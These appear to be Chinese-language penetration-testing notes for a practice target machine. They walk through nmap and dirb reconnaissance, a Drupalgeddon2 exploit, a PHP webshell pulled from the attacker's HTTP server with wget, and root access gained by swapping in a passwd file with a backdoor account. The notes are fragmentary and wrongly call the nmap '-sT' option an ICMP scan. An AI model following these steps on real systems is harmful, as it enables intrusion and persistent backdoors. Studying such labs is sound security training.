为什么要打靶机???---> 思路 ---> 靶机所需思路来提升单个漏洞攻击水平
靶场:专项漏洞练习---> 学会各种单向漏洞的攻击姿势(单项的攻击方式提升) 靶机:单个攻击项目---> 增长攻击方式/思路/经验(增加攻击思路于是姿势
首先打开kali 输入 ifconfig查询自己的ip
一、确定靶机地址 输入nmap 192.168.1.0/24 -sT #-sT 使用ICMP协议进行扫描
二、扫描网站的敏感目录 dirb http://192.168.1.28
三、对 192.168.1.28 /drupal页面做漏洞挖掘 通过Github 下载 Drupal exploit漏洞进行利用 拖到kali桌面 输入gem install highline ./drupalgeddon2.rb
系统账户 Linux系统的低权限账户 操作受限 需要进行权限提升 做网站的权限维持:---> 给网站留后门 拿到目标一点的权限立马做权限维持 蚁剑:网站后门的管理程序 网站后门: 一句话木马 开启HTTP服务 python3 -m http.server 8080
执行 wget http://192.168.1.36:8080/123.php 命令将木马下
验证网站后门的地址在蚁剑链接并执行命令
五、权限提升
- 下载passwd文件到本地
- 在本地添加后门账号保存 ?造出Linux操作系统中用户的密码加密值
-
将这个passwd下载回靶机中进行替换 -
蚁剑中执行wget http://192.168.1.36:8080/passwd -O passwd -
? -
拿到root用户的falg信息 -
?
|